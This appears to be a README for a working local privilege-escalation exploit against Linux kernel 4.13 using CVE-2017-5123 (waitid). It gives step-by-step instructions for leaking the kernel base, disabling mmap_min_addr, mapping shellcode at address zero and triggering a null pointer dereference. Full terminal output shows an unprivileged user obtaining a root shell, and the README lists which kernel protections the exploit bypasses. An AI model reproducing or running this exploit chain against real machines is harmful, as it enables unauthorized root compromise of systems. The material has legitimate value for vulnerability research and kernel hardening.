# Exploit for CVE-2017-5123
## Step
* Complile kernel with null pointer dereference module
* Run a VM( qemu) with costum kernel( no smep default)
* Found mmap_min_addr/dac_mmap_min_addr address by reading "/proc/kallsyms" or waitid infoleak
* Overwrite the mmap_min_addr/dac_mmap_min_addr by calling waitid( CVE-2017-5123), disable mmap_min_addr
* Map the shellcode to 0x00 and touch the kernel null point dereference to get privilege
* Run a shell with root
## Can & can't
Kernel version 4.13
Need:( "/proc/kallsyms" readable | vmlinux) & (kernel null pointer dereference)
Bypass:mmap_min_addr, ksalr
Not bypass: SMEP
Exploit: kernel null pointer dereference
Result: get a root shell
## Source files
* [disable_map_min_addr.c](disable_map_min_addr.c) for step 3~4
* [null_poiter_exploit.c](null_poiter_exploit.c) for step 5-6
* [test.c](test.c) for step 1
## Result
My exploit success on Debian9/QEMU.
NOTE:QEMU without SMEP default, and my exploit can't bypass SMEP.T_T
```
bins@debian:~$ id
uid=1000(bins) gid=1000(bins) groups=1000(bins),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),113(bluetooth),114(lpadmin),118(scanner)
bins@debian:~$ cat /proc/sys/vm/mmap_min_addr
1024
bins@debian:~$ ./disable_map_min_addr
[+] Leak size=144 bytes
[+] Leak point: 0x7fff62dbbb00
[+] Leak point: 0x7fff62dbbb08
[+] Leak point: 0x7fff62dbbb10
[+] Leak point: 0x7fff62dbbb18
[+] Leak point: 0x7fff62dbbb20
[+] Leak point: 0x7fff62dbbb28
[+] Leak point: 0x7fff62dbbb30
[+] Leak point: 0x7fff62dbbb38
[+] Leak point: 0x7fff62dbbb40
[+] Find startup_64...
[+] Found startup_64 at ffffffffa2a00000
[+] Got kernel base: 0xffffffffa2a00000
[+] Got mmap_min_addr: 0xffffffffa3b01de8
[+] Got dac_mmap_min_addr: 0xffffffffa388e810
[+] Overwriting map_min_addr...
[+] Overwriting dac_mmap_min_addr...
[+] map_min_addr disabled!
bins@debian:~$ cat /proc/sys/vm/mmap_min_addr
0
bins@debian:~$ ./null_poiter_exploit
[+] Find prepare_kernel_cred...
[+] Found prepare_kernel_cred at ffffffffa2a77300
[+] Find commit_creds...
[+] Found commit_creds at ffffffffa2a76f80
Got commit_creds:0xffffffffa2a76f80,prepare_kernel_cred0xffffffffa2a77300
[+] Try to allocat 0x00000000...
[+] Allocation success !
[+]Start touch kernel null point
[+] Root shell success !! :)
# id
uid=0(root) gid=0(root) groups=0(root)
#
```
## Other
All the source is modified from spender & @XeR_0x2A & @chaign_c & up201407890:
[spender bypass kaslr poc](https://grsecurity.net/~spender/exploits/wait_for_kaslr_to_be_effective.c)
[up201407890 disable selinux poc](http://seclists.org/oss-sec/2017/q4/134)
[@XeR_0x2A & @chaign_c map shellcode to 0x00](https://www.exploit-db.com/exploits/43029/)
[vulnerability analysis in chinese](https://github.com/Bins94/Kernel_Anatomy/tree/master/kernel_4.13_waitid_poc)